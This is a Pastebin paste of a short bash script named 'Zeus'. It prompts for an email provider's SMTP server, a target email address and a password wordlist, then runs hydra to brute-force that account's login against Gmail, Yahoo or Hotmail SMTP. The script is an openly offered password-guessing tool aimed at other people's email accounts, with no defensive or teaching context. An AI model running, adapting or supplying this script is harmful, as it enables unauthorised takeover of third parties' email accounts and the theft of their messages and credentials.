Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Note you Must have hydra installed, use: sudo apt-get install hydra hydra-gtk
- #! /bin/bash
- echo Welcome to Zeus
- sleep 1s
- echo Written By: Ov3rxRide
- echo NOTE: You need a wordlist obviously!
- echo Powering Up:
- sleep 3s
- echo Starting:
- sleep 3s
- echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
- read smtp
- echo Enter Email Address:
- read email
- echo Provide Directory of Wordlist for Passwords:
- read wordlist
- echo Generating:
- sleep 3s
- echo Generated
- sleep 1s
- echo Thank you for using Zeus
- hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement